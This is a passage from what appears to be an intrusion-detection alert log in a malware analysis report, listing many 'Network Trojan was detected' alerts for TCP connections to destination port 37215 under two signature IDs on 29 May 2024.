                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716341
                SID:2835222
                Source Port:53062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990048
                SID:2829579
                Source Port:36624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857177
                SID:2829579
                Source Port:46498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860229
                SID:2835222
                Source Port:49388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137020
                SID:2829579
                Source Port:40710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.105067
                SID:2835222
                Source Port:50358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173328
                SID:2829579
                Source Port:60238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.458262
                SID:2835222
                Source Port:58694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523817
                SID:2835222
                Source Port:54838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113061
                SID:2829579
                Source Port:34444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414748
                SID:2835222
                Source Port:51206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712026
                SID:2829579
                Source Port:45106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878031
                SID:2835222
                Source Port:36978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440824
                SID:2835222
                Source Port:40830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286710
                SID:2829579
                Source Port:57650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498537
                SID:2829579
                Source Port:46310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782492
                SID:2835222
                Source Port:39900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422573
                SID:2835222
                Source Port:40062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804939
                SID:2835222
                Source Port:43204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868004
                SID:2835222
                Source Port:53796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763435
                SID:2829579
                Source Port:37174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570138
                SID:2835222
                Source Port:44570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418586
                SID:2835222
                Source Port:37830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025653
                SID:2835222
                Source Port:39852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419375
                SID:2829579
                Source Port:41804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900357
                SID:2835222
                Source Port:49120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781296
                SID:2829579
                Source Port:50806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586689
                SID:2829579
                Source Port:35782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784618
                SID:2829579
                Source Port:46652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264875
                SID:2835222
                Source Port:33358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237545
                SID:2835222
                Source Port:44348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653533
                SID:2835222
                Source Port:48368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815780
                SID:2835222
                Source Port:51706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024361
                SID:2829579
                Source Port:59376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038171
                SID:2829579
                Source Port:38850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502113
                SID:2829579
                Source Port:34216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369395
                SID:2829579
                Source Port:36088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655038
                SID:2829579
                Source Port:57870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870372
                SID:2835222
                Source Port:46152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845274
                SID:2835222
                Source Port:58940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975396
                SID:2829579
                Source Port:39250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816839
                SID:2829579
                Source Port:32822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652205
                SID:2835222
                Source Port:57688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281697
                SID:2829579
                Source Port:44044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686343
                SID:2829579
                Source Port:49098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969604
                SID:2829579
                Source Port:47296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209464
                SID:2829579
                Source Port:43834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855731
                SID:2829579
                Source Port:41656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269931
                SID:2835222
                Source Port:44696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976205
                SID:2829579
                Source Port:57972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179830
                SID:2829579
                Source Port:42104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.454032
                SID:2829579
                Source Port:57702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437430
                SID:2835222
                Source Port:54700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.616626
                SID:2835222
                Source Port:39114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776794
                SID:2835222
                Source Port:44796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968574
                SID:2835222
                Source Port:44278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841744
                SID:2835222
                Source Port:37698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784649
                SID:2835222
                Source Port:58962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.037077
                SID:2835222
                Source Port:33142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.081839
                SID:2829579
                Source Port:41060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672544
                SID:2829579
                Source Port:33164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949594
                SID:2829579
                Source Port:40920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915610
                SID:2829579
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941410
                SID:2829579
                Source Port:43950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874683
                SID:2835222
                Source Port:55440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287453
                SID:2835222
                Source Port:47302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239009
                SID:2829579
                Source Port:53756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997409
                SID:2829579
                Source Port:43700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574546
                SID:2835222
                Source Port:51796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272447
                SID:2835222
                Source Port:49208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857168
                SID:2829579
                Source Port:48114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438785
                SID:2835222
                Source Port:40360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231579
                SID:2829579
                Source Port:37688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371542
                SID:2829579
                Source Port:49932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844615
                SID:2835222
                Source Port:33852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292535
                SID:2835222
                Source Port:43080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071464
                SID:2835222
                Source Port:42152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531251
                SID:2829579
                Source Port:39434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944577
                SID:2829579
                Source Port:41336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976408
                SID:2829579
                Source Port:45792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.042576
                SID:2835222
                Source Port:47992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684934
                SID:2835222
                Source Port:56364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263030
                SID:2829579
                Source Port:42902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519756
                SID:2829579
                Source Port:57204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763276
                SID:2829579
                Source Port:51724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110485
                SID:2829579
                Source Port:40530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165302
                SID:2829579
                Source Port:34436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855926
                SID:2829579
                Source Port:41550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543947
                SID:2835222
                Source Port:43162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981456
                SID:2829579
                Source Port:50258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897720
                SID:2829579
                Source Port:57168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155068
                SID:2835222
                Source Port:53580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266966
                SID:2835222
                Source Port:57284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795263
                SID:2835222
                Source Port:36066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013824
                SID:2829579
                Source Port:39892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612824
                SID:2829579
                Source Port:51354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664197
                SID:2835222
                Source Port:58818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915549
                SID:2829579
                Source Port:57632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570705
                SID:2829579
                Source Port:49322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785428
                SID:2829579
                Source Port:36832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909308
                SID:2829579
                Source Port:34486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809716
                SID:2835222
                Source Port:56788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438738
                SID:2829579
                Source Port:42202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.848252
                SID:2829579
                Source Port:48014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982176
                SID:2835222
                Source Port:41122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651749
                SID:2835222
                Source Port:56014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240145
                SID:2829579
                Source Port:38398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993944
                SID:2829579
                Source Port:34684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816959
                SID:2829579
                Source Port:57344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537218
                SID:2835222
                Source Port:57638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562102
                SID:2829579
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969700
                SID:2829579
                Source Port:44978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977267
                SID:2835222
                Source Port:36382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732303
                SID:2835222
                Source Port:53536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520212
                SID:2835222
                Source Port:47852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689181
                SID:2829579
                Source Port:37910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210952
                SID:2835222
                Source Port:58662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557080
                SID:2829579
                Source Port:45066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668112
                SID:2835222
                Source Port:58910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857100
                SID:2835222
                Source Port:37702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965468
                SID:2835222
                Source Port:56588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666288
                SID:2829579
                Source Port:52876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024788
                SID:2835222
                Source Port:49462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080148
                SID:2835222
                Source Port:53500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.699385
                SID:2835222
                Source Port:45304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038057
                SID:2835222
                Source Port:33978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766102
                SID:2835222
                Source Port:42700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841317
                SID:2829579
                Source Port:55734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767612
                SID:2835222
                Source Port:51976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443190
                SID:2829579
                Source Port:47782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262449
                SID:2835222
                Source Port:38682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331061
                SID:2835222
                Source Port:56190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969647
                SID:2835222
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074744
                SID:2835222
                Source Port:38694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810925
                SID:2829579
                Source Port:34124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943057
                SID:2835222
                Source Port:57404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904974
                SID:2835222
                Source Port:35220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984830
                SID:2835222
                Source Port:45234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662001
                SID:2829579
                Source Port:33312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511040
                SID:2835222
                Source Port:33630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.044980
                SID:2829579
                Source Port:37050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872791
                SID:2835222
                Source Port:38472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615237
                SID:2835222
                Source Port:51998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864999
                SID:2835222
                Source Port:36970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715213
                SID:2835222
                Source Port:45378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652378
                SID:2829579
                Source Port:53378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941152
                SID:2829579
                Source Port:55128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788322
                SID:2835222
                Source Port:35750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317798
                SID:2829579
                Source Port:60328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.116418
                SID:2829579
                Source Port:60646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913949
                SID:2829579
                Source Port:50796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716145
                SID:2829579
                Source Port:33002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582816
                SID:2829579
                Source Port:57646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886075
                SID:2835222
                Source Port:42218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659603
                SID:2835222
                Source Port:59978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276933
                SID:2829579
                Source Port:57634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629130
                SID:2829579
                Source Port:38966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613071
                SID:2829579
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209822
                SID:2829579
                Source Port:39714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532108
                SID:2835222
                Source Port:52576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.430817
                SID:2829579
                Source Port:47956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100998
                SID:2835222
                Source Port:46772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332748
                SID:2829579
                Source Port:49034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317946
                SID:2829579
                Source Port:42836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436074
                SID:2835222
                Source Port:58282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278294
                SID:2829579
                Source Port:56000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283171
                SID:2835222
                Source Port:47718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663271
                SID:2829579
                Source Port:50726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583110
                SID:2829579
                Source Port:33696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783183
                SID:2835222
                Source Port:58896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292212
                SID:2835222
                Source Port:50444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656003
                SID:2835222
                Source Port:54068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629218
                SID:2835222
                Source Port:39574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551307
                SID:2835222
                Source Port:59058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286980
                SID:2829579
                Source Port:48956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070153
                SID:2829579
                Source Port:52222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947004
                SID:2835222
                Source Port:49790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.931051
                SID:2835222
                Source Port:43880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035553
                SID:2829579
                Source Port:51540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374575
                SID:2829579
                Source Port:33600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.144916
                SID:2835222
                Source Port:46066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914279
                SID:2829579
                Source Port:36732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869548
                SID:2835222
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931468
                SID:2829579
                Source Port:39436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522120
                SID:2835222
                Source Port:48696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.469622
                SID:2829579
                Source Port:51830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287084
                SID:2829579
                Source Port:55104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948957
                SID:2829579
                Source Port:60880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166929
                SID:2835222
                Source Port:38978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868281
                SID:2835222
                Source Port:50322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683789
                SID:2829579
                Source Port:52138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.610395
                SID:2835222
                Source Port:58618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559070
                SID:2835222
                Source Port:44194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787045
                SID:2829579
                Source Port:50090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927754
                SID:2829579
                Source Port:57288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335877
                SID:2829579
                Source Port:56196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.561944
                SID:2835222
                Source Port:33706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
